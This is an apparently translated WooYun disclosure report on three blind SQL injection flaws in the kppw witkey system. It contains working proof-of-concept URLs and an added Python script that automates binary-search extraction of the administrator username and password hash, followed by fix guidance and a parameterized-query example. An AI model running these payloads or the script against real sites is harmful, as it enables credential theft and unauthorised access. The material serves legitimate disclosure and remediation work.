
Vulnerability summary

Defect ID: wooyun-2014-050078

Title: kppw witkey system has multiple blind SQL injection vulnerabilities

Vendor: keke.com

Author: lancer

Submitted: 2014-04-01 12:05

Fix time: 2014-06-30 12:05

Public disclosure: 2014-06-30 12:05

Vulnerability type: SQL injection

Severity (self-rated): Medium

Self-rated Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-04-01: Details sent to the vendor, awaiting vendor handling
2014-04-01: Vendor confirmed; details visible to the vendor only
2014-04-04: Details opened to third-party security partners
2014-05-26: Details opened to core white hats and relevant domain experts
2014-06-05: Details opened to regular white hats
2014-06-15: Details opened to intern white hats
2014-06-30: Details opened to the public

Brief description:

Insufficient sanitization of request parameters leads to boolean-based blind SQL injection at three points; the administrator's username and password can be extracted character by character.

Detailed description:

Vulnerable code, location 1:
/control/ajax/ajax_indus.php, lines 11-31

if (isset ( $code ) && $code == 'r5tv') {              // fixed string in the URL, not an access control
    $tem_arr = array ($indus_pid );                     // $indus_pid comes straight from the request
    $indus_p_arr = kekezu::get_indus_by_index ( 1, $indus_pid );
    foreach ( $indus_p_arr [$indus_pid] as $k => $v ) {
        array_push ( $tem_arr, $v ['indus_id'] );
    }
    $indus_ids = implode ( ',', $tem_arr );             // the raw value is the first element of the list
    unset ( $tem_arr );
    $skill_obj = new Keke_witkey_skill_class ();
    $skill_obj->setWhere ( "indus_id in ($indus_ids)" );    // injection sink: unquoted and unescaped
    $skill_arr = $skill_obj->query_keke_witkey_skill ();
    if (count ( $skill_arr ) == 0) {
        $option = array ($_lang['no_relation_skill']);      // "no related skills": the boolean oracle
    } else {
        foreach ( $skill_arr as $row ) {
            $option [] = $row [skill_id] . '=>' . $row [skill_name];
        }
    }
    echo implode ( '|', $option );
    exit ();
}


$indus_pid is taken from the request and placed unquoted, without any validation, as the first element of the IN (...) list, so anything appended to it becomes part of the WHERE clause. The code=r5tv gate is a constant visible in the URL, not an authentication check. Because the response is either skill data or the "no related skills" string, the endpoint doubles as a boolean oracle for blind injection.

Vulnerable code, location 2:
/lib/inc/keke_user_mark_class.php, lines 221-253

public static function get_user_aid($uid, $mark_type, $mark_status = null, $role_type = null, $model_code = null, $obj_id = null) {
    $aid_config = self::get_mark_aid ( $mark_type );
    $where = " mark_type='$mark_type' ";
    $role_type == '1' and $where .= " and uid='$uid'";
    $role_type == '2' and $where .= " and by_uid='$uid'";
    if(is_null($mark_status)){
        $where .= " and mark_status > 0";
    }else{
        $where .= " and mark_status = $mark_status";    // injection sink: interpolated unquoted, no escaping
    }
    $model_code and $where .= " and model_code='$model_code' ";
    $obj_id and $where .= " and obj_id = '$obj_id' ";
    $aid_arr = db_factory::query ( " select aid,aid_star from " . TABLEPRE . "witkey_mark where $where " );
    $aid_info = array ();
    $si = sizeof ( $aid_arr );
    foreach ( $aid_config as $k => $v ) {
        if($aid_arr){
            for($i = 0; $i < $si; $i ++) {
                $aid_arr [$i] ['aid'] and $aid = explode ( ",", $aid_arr [$i] ['aid'] ) or $aid = array ();
                $aid_arr [$i] ['aid_star'] and $star = explode ( ",", $aid_arr [$i] ['aid_star'] ) or $star = array ();
                $aid&&$star and $aid_s = array_combine ( $aid, $star );
                $aid_info [$k] ['aid_name'] = $v ['aid_name'];
                $aid_info [$k] ['star'] += floatval($aid_s [$k] );
                $aid_info [$k] ['count'] += 1;
            }
        }else{
            $aid_info [$k] ['aid_name'] = $v ['aid_name'];
            $aid_info [$k] ['star'] = 0;
            $aid_info [$k] ['count'] = 0;
        }
    }
    return self::consider_star ( $aid_info );
}


$mark_status is interpolated unquoted into the WHERE clause without sanitization, so no quote character is needed to break out of the comparison; the value is reached from the request through do=ajax&view=task&ajax=mark_aid (see the proof below). Whether the query returns rows decides what the page renders, which again gives a boolean oracle.

Vulnerable code, location 3:
/control/ajax/ajax_menu.php, lines 30-39

case "load_square" :
    if ($ids) {
        $model_info = kekezu::get_table_data('*','witkey_model','model_status=1','','','','model_code');
        $cash_cove = $kekezu->get_cash_cove('',true);
        $op_desc = array('pub'=>'发布','leave'=>'留言','work'=>'投稿','focus'=>'收藏','buy'=>'购买');
        // injection sink: PHP interpolates $ids into the string before sprintf() runs; sprintf only fills in TABLEPRE
        $square_arr = db_factory::query( sprintf ( " select * from %switkey_weibo where weibo_id in ($ids) order by on_time desc", TABLEPRE ) );
    } else {
        die ();
    }
    break;


$ids is interpolated into the IN (...) clause without sanitization. The sprintf() call offers no protection: it substitutes only the table prefix, and $ids has already been expanded into the format string by the time sprintf() sees it.

Proof of vulnerability:

Exploitation of the first vulnerability:
1. Request directly:
/index.php?do=ajax&view=indus&code=r5tv&indus_pid=0) || substr((select username from keke_witkey_member where uid=1),1,1)=0x61 limit 1%23
When the guessed character matches, skill data is returned;
when it does not, the response is "no related skills".
0x61 is the letter 'a'; stepping the substr() offset and the compared byte recovers the whole username, and the same subquery against the password column recovers the password hash.

[Screenshot 1.jpg: match, skill data returned]

[Screenshot 2.jpg: no match, "no related skills"]

Exploitation of the second vulnerability:
1. Request directly:
/index.php?do=ajax&view=task&ajax=mark_aid&auid=-1&mark_type=1&mark_status=1 || substr((select username from keke_witkey_member where uid=1),1,1)=0x61
Match:

[Screenshot 1.jpg]

No match:

[Screenshot 2.jpg]

Exploitation of the third vulnerability:
1. First post a message on the square, so that the weibo table is not empty.

[Screenshot 1.jpg]

2. Request directly:
/index.php?do=ajax&view=menu&ajax=load_square&ids=1) and substr((select username from keke_witkey_member where uid=1),1,1)=0x61%23
Match:

[Screenshot 2.jpg]

No match:

[Screenshot 3.jpg]
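The three requests above are single manual probes. The following Python script is an added example, not part of the original report or of the kppw code: it automates the same boolean oracle for all three injection points, using the request templates taken from the PoC URLs. Instead of the =0x61 equality it uses ord(substr(...)) > N with a binary search, so each byte costs about seven requests, and the comparison is not affected by MySQL's default case-insensitive collation (under which =0x61 also matches 'A'). The HTTP oracle, the base URL and the "miss" marker string are assumptions to be set for the target; the simulated oracle is a constructed stand-in for the server so that the script runs offline.

```python
"""Boolean-based blind extraction for the kppw injection points (added example)."""
import re
import urllib.parse
import urllib.request
from typing import Callable

# Request templates copied from the report's three PoC URLs. {cond} is replaced
# with a boolean SQL condition; the page responds differently depending on it.
INJECTION_POINTS = {
    "indus": ("/index.php?do=ajax&view=indus&code=r5tv&indus_pid=",
              "0) || {cond} limit 1#"),
    "mark_aid": ("/index.php?do=ajax&view=task&ajax=mark_aid&auid=-1&mark_type=1&mark_status=",
                 "1 || {cond}"),
    "load_square": ("/index.php?do=ajax&view=menu&ajax=load_square&ids=",
                    "1) and {cond}#"),
}

# Subquery from the report; swap 'username' for 'password' to pull the hash.
TARGET = "(select username from keke_witkey_member where uid=1)"


def build_condition(pos: int, threshold: int, subquery: str = TARGET) -> str:
    # ord() of '' is 0 in MySQL, so reading past the end of the string is never
    # greater than any threshold >= 0: that is how extract() detects the end.
    return f"ord(substr({subquery},{pos},1))>{threshold}"


def build_url(base: str, point: str, cond: str) -> str:
    """Full URL for one probe; the payload is percent-encoded (# becomes %23)."""
    prefix, template = INJECTION_POINTS[point]
    return base + prefix + urllib.parse.quote(template.format(cond=cond), safe="")


def extract(oracle: Callable[[str], bool], max_len: int = 64) -> str:
    """Recover the target string one byte at a time with a binary search.

    oracle(cond) must return True when the SQL condition is true on the server.
    Values are assumed to be 7-bit (0..127); widen the range for other data.
    """
    result = []
    for pos in range(1, max_len + 1):
        low, high = 0, 127
        while low < high:
            mid = (low + high) // 2
            if oracle(build_condition(pos, mid)):
                low = mid + 1          # byte is above mid
            else:
                high = mid             # byte is at most mid
        if low == 0:                   # past the end of the string
            break
        result.append(chr(low))
    return "".join(result)


def http_oracle(base: str, point: str, miss_marker: str) -> Callable[[str], bool]:
    """Real oracle (assumption: plain GET, no session, as in the report's URLs).

    miss_marker is the text the page shows when no rows match, e.g. the
    'no related skills' string ($_lang['no_relation_skill']) for the indus endpoint.
    """
    def oracle(cond: str) -> bool:
        with urllib.request.urlopen(build_url(base, point, cond), timeout=10) as resp:
            body = resp.read().decode("utf-8", "replace")
        return miss_marker not in body
    return oracle


COND_RE = re.compile(r"ord\(substr\(.*?,(\d+),1\)\)>(\d+)")


def simulated_oracle(secret: str) -> Callable[[str], bool]:
    """Constructed stand-in for the server so the script runs offline.

    It evaluates the condition the way MySQL would for a column holding
    `secret`; it is part of this demo only, not of the technique.
    """
    def oracle(cond: str) -> bool:
        m = COND_RE.fullmatch(cond)
        if m is None:
            raise ValueError("unexpected condition: " + cond)
        pos, threshold = int(m.group(1)), int(m.group(2))
        byte = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return byte > threshold
    return oracle


if __name__ == "__main__":
    # Offline demo against a constructed username. Against a real target replace
    # the simulated oracle with http_oracle("http://target", "indus", "没有相关技能").
    print(extract(simulated_oracle("admin")))
```

The miss marker differs per endpoint: for the indus endpoint it is the "no related skills" string, for the other two it is whatever the page renders when the query returns no rows, which has to be observed once by hand as in the screenshots above.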

Fix:

Sanitize the parameters. All three sinks expect integers: cast $indus_pid and $mark_status with intval() (or reject anything that is not a digit string) before they reach the query, and reduce $ids to a comma-separated list of integers (for example array_map('intval', explode(',', $ids))) before it is joined into the IN (...) clause. Better still, move these queries to prepared statements with bound parameters so that request values are never concatenated into SQL text at all. The code=r5tv check in ajax_indus.php is a fixed string, not an access control, and must not be relied on to limit who can reach the query.
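To make the fix concrete, the following is an added example in Python, not kppw code (which is PHP; the same checks map to a digit check plus intval() and array_map('intval', explode(',', ...)) there). It shows strict parsing of the integer parameters and a parameterized IN (...) list whose placeholder count follows the list length, run against a constructed in-memory SQLite table so it executes offline. Table and column names are assumptions taken from the snippets on this page.

```python
"""Strict parameter parsing and a parameterized IN (...) list (added example)."""
import re
import sqlite3

INT_RE = re.compile(r"[0-9]+")                 # ASCII digits only (str.isdigit accepts more)
ID_LIST_RE = re.compile(r"[0-9]+(,[0-9]+)*")   # '1,2,3'; no spaces, quotes, ')', '|' or '#'


def parse_int(value: str, name: str) -> int:
    """Accept only a digit string; the check for $indus_pid and $mark_status."""
    if not isinstance(value, str) or INT_RE.fullmatch(value) is None:
        raise ValueError(f"{name} must be a non-negative integer")
    return int(value)


def parse_id_list(value: str, name: str, limit: int = 100) -> list:
    """Accept only a comma-separated list of integers; the check for $ids."""
    if not isinstance(value, str) or ID_LIST_RE.fullmatch(value) is None:
        raise ValueError(f"{name} must be a comma-separated list of integers")
    ids = [int(x) for x in value.split(",")]
    if len(ids) > limit:                        # bound the IN (...) size as well
        raise ValueError(f"{name}: too many entries")
    return ids


def is_rejected(raw: str) -> bool:
    """True when parse_id_list() refuses the input (used by the demo below)."""
    try:
        parse_id_list(raw, "ids")
    except ValueError:
        return True
    return False


def query_skills(conn: sqlite3.Connection, indus_ids_raw: str) -> list:
    """Replacement for `indus_id in ($indus_ids)`: one '?' per id, values bound separately."""
    ids = parse_id_list(indus_ids_raw, "indus_pid")
    placeholders = ",".join("?" * len(ids))
    sql = (f"SELECT skill_id, skill_name FROM witkey_skill "
           f"WHERE indus_id IN ({placeholders}) ORDER BY skill_id")
    return conn.execute(sql, ids).fetchall()


def query_marks(conn: sqlite3.Connection, mark_type_raw: str, mark_status_raw: str) -> list:
    """Replacement for `mark_status = $mark_status`: the value is bound, never interpolated."""
    mark_type = parse_int(mark_type_raw, "mark_type")
    mark_status = parse_int(mark_status_raw, "mark_status")
    sql = "SELECT aid, aid_star FROM witkey_mark WHERE mark_type = ? AND mark_status = ?"
    return conn.execute(sql, (mark_type, mark_status)).fetchall()


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the kppw tables referenced on this page."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE witkey_skill(skill_id INTEGER, skill_name TEXT, indus_id INTEGER);
        INSERT INTO witkey_skill VALUES (1,'php',10),(2,'mysql',10),(3,'design',20);
        CREATE TABLE witkey_mark(aid TEXT, aid_star TEXT, mark_type INTEGER, mark_status INTEGER);
        INSERT INTO witkey_mark VALUES ('1,2','5,4',1,1),('1','3',1,2);
    """)
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(query_skills(db, "10,20"))
    print(is_rejected("0) || 1=1 limit 1#"))   # the report's payload shape is refused
```

Rejecting malformed input with an error, rather than silently casting it, has the side benefit that the probes in the proof above produce a distinguishable error response instead of a boolean oracle.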

Copyright notice: when reposting, credit lancer@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-04-01 14:28

Vendor reply:

Thank you for your attention; we will do our best to release a patch package to address the issue.

Latest status:

None